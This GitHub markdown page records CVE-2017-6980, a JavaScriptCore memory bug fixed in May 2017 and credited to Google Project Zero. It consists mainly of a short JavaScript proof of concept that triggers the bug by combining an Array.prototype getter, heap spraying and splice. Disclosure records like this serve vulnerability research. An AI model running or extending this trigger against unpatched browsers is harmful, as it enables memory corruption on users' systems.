CVE-2017-6980

Fix: May 2017
Credit: lokihardt, Google Project Zero

PoC

function gc() {
    for (let i = 0; i < 0x10; i++)
        new ArrayBuffer(0x1000000);
}

Array.prototype.__defineGetter__(0x1000, () => 1);

gc();

for (let i = 0; i < 0x100; i++) {
    new Array(0x100).fill(1234.5678);
}

gc();

print(new Array(0x100).splice(0));

Reference

Apple
Google Project Zero

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CVE-2017-6980.md

CVE-2017-6980.md

CVE-2017-6980

PoC

Reference

Files

CVE-2017-6980.md

Latest commit

History

CVE-2017-6980.md

File metadata and controls

CVE-2017-6980

PoC

Reference